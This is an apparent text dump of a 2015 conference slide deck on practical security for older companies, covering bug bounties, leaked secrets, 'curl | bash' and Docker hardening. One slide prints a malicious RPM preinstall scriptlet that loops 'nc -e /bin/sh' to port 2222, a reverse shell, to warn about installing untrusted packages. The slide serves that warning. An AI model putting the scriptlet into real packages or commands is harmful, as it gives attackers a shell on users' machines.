Security for non-unicorns

C7bf554286ede7cb2786b5b19649c19b?s=47 Bea Hughes
September 25, 2015

Security for non-unicorns September 2015.

Security is becoming quite the thing now days, everyone wants to have one of them. The mantra that things should be built with security in mind and can't be plastered on later is a very important one, if you're based in Silicon Valley and are about to write "teh new hotness", but what happens if your company is older than say, 6 months. You already have some legacy systems and code. I'll be talking about how it's possible to unearth some of these things. What happens when you do uncover these things. How to stop them happening. And coping strategies for dealing with them


Bea Hughes

September 25, 2015


  1. Security For Non-Unicorns 1 @benjammingh for 1

  2. Who's this clown? 2 • Infrastructure security charlatan at Etsy

    • Operations monkey at Puppet Labs • Survived a bunch of startups in London. (some of them still have websites...) • Has far too many opinions about pretty much everything on the TwitterNet @benjammingh 2 @benjammingh for 2
  3. Unicorns? @benjammingh for 3

  4. Setlist • The problem(™). • The solution(s)(™). • The wrap

    up. • Rapturous applause. • We all go home/dance parties/our secret lives as superheroes & heroines. @benjammingh for 4
  5. The problem security is hard. @benjammingh for 5

  6. From tiny seeds, do mighty acorns grow. • PinkiePwn's 6

    small bugs in Chrome to full sandbox escape • Egor Homakov's 5 small bugs in Github to full private access on GitHub • from XSS to remote code execution in under an hour • Username & password stolen for HVAC system leads to $160+ Million Target breach. @benjammingh for 6
  7. Things that aren't security are hard too. @benjammingh for

  8. Computering is hard. No. 1 takeaway for security types is

    a sense of perspective. @benjammingh for 8
  9. Security people aren't great secure coders. • Snort: 10 CVEs,

    Wireshark: 322! CVEs • Joxean Koret on Breaking Antivurius software • Security Firm Bit9 Hacked, Used to Spread Malware • Tavis Ormandy from Project Zero on exploiting ESET • BEST! FireEye just running Apache/PHP as root @benjammingh for 9
  10. So who do I trust? • No one? Always a

    great position for security people, who don't want to get paid. • Everyone? Do I have a 419 email for YOU! • Security vendors? If you have infinite money and no attackers. • Attackers! @benjammingh for 10
  11. "You're already being probed for security holes, do you want

    to know or not?" @benjammingh for 11
  12. Bug bounties 101: Have one! Bug Crowd vs. HackerOne @benjammingh

    for 12
  13. Bug bounties 102: Prepare a lot. @benjammingh for 13

  14. Bug bounties 103: The first few weeks will be hell.

    @benjammingh for 14
  15. Bug bounties 104: Be ready with bees! @benjammingh for

  16. Security on the inside @benjammingh for 16

  17. Armadillo security architecture @benjammingh for 17

  18. Cloud @benjammingh for 18

  19. Github @benjammingh for 19

  20. @benjammingh for 20

  21. But this doesn't happen in real life, right? @benjammingh for 21
  22. @benjammingh for 22

  23. Go use Gitrob • source-in-osint/ • @benjammingh for 23
  24. curl | bash @benjammingh for 24

  25. curl | sh @benjammingh for 25

  26. "But I check them, obviously!" @benjammingh for 26

  27. @benjammingh for 27

  28. curl | bash "But this is no worse than packages."

    root# yum install sketchy @benjammingh for 28
  29. curl | bash root# rpm -qp --scripts sketchy-1.33-7.rpm preinstall scriptlet

    (using /bin/sh): bash -c 'while : ; \ do \ nc -e /bin/sh 2222 ;\ done' @benjammingh for 29
  30. A LIVE DEMO, madness. @benjammingh for 30

  31. Lightweight containers! @benjammingh for 31

  32. chroot(8) @benjammingh for 32

  33. FreeBSD Jails @benjammingh for 33

  34. Solaris Zones @benjammingh for 34

  35. AIX LPAR @benjammingh for 35

  36. @benjammingh for 36

  37. Is Docker secure? @benjammingh for 37

  38. >30% of Images in Docker Hub Contain High Priority Security

    Vulns - Jayanth Gummaraju, Tarun Desikan and Yoshio Turner from BanyanOps @benjammingh for 38
  39. @benjammingh for 39

  40. As secure as Vagrant? @benjammingh for 40

  41. But is Docker itself secure? • Don't run things as

    root. • No really, stop running things as root. • Did I mention not running things as root. • It is also not 1999. (Docker 1.8 addresses some of this, with it's changes to who it runs as) @benjammingh for 41
  42. Securify the Docker. • Don't use --privileged. • Use --cap-drop

    all and --cap-drop <thing> to get the minimum capabilities. • Use Docker Notary • Use GRSecurity (just do that anyway, if you can.) • Use SELinux... I may as well ask for a pony here. @benjammingh for 42
  43. Summary • Computers are apparently hard. • Security is clearly

    harder still, obv. • Actually trust and humans is hard. • The typing is the easy bit. (ish) @benjammingh for 43
  44. More Summary • Complex systems lead to much more complex

    security problems. (see Oauth) • Annual pen-tests don't scale, bug bounties can. • Attackers are mining any public info you have (GitHub, S3) • I beg you to stop trusting curl. • Docker and security can be used in the same sentence. @benjammingh for 44
  45. Thank you! Twidder: @benjammingh LinkedIn: FidoNet: 2:254/524.13 JitHub:

    SpeakerDeck: Etsy: Careers CodeAsCraft @benjammingh for 45